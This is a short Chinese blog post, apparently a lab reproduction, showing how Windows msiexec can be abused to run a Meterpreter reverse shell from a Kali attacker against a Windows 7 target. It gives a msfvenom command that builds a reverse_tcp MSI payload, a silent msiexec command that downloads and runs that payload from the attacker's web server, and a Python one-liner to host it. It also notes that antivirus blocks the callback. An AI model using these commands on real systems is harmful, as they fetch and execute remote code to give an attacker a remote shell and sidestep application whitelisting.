本文介绍了Msiexec,它是Windows Installer一部分,用于安装MSI包。在kali攻击机和win7靶机环境下复现执行payload,有AV时无法弹回,无AV则成功。还提及payload生成、靶机命令等,总结指出过不了AV会被拦截,无法弹回可尝试弹出cmd。
0x00 Msiexec 简介
Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 2003,Windows 7等
0x01 环境
攻击机kali 192.168.5.99
靶机win7 192.168.5.112
装有国内常见AV
0x02复现
攻击机配置监听
靶机执行
有AV无法弹回。
无AV成功
0x03
payload生成
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.99 lport=10129 -f msi > shell.msi
靶机命令
msiexec /q /i http://192.168.5.99/shell.msi
用python启动80监听
python -m SimpleHTTPServer 80
0x04总结
不过AV,会被拦截。若无法弹回,可测试使用弹出一个cmd,详见借鉴链接2
0x05借鉴
https://github.com/Micropoor/Micro8/blob/master/第七十八课:基于白名单Msiexec执行payload第八季.pdf
https://www.cnblogs.com/backlion/p/10493910.html
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
